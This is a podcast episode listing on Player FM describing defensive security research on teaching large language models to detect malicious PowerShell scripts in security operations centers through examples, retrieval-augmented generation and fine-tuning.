Go offline with the Player FM app!
Teaching LLMs to spot malicious PowerShell scripts
Manage episode 490966948 series 2800269
Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can assist those who work in security operations centers to identify malicious PowerShell scripts. From teaching LLMs through examples, to using retrieval-augmented generation and fine-tuning specialized models, Ryan walks us through three distinct approaches, with surprising performance gains. For the full research, head to https://www.splunk.com/en_us/blog/security/guiding-llms-with-security-context.html
217 episodes
Manage episode 490966948 series 2800269
Hazel welcomes back Ryan Fetterman from the SURGe team to explore his new research on how large language models (LLMs) can assist those who work in security operations centers to identify malicious PowerShell scripts. From teaching LLMs through examples, to using retrieval-augmented generation and fine-tuning specialized models, Ryan walks us through three distinct approaches, with surprising performance gains. For the full research, head to https://www.splunk.com/en_us/blog/security/guiding-llms-with-security-context.html
217 episodes
All episodes
×Welcome to Player FM!
Player FM is scanning the web for high-quality podcasts for you to enjoy right now. It's the best podcast app and works on Android, iPhone, and the web. Signup to sync subscriptions across devices.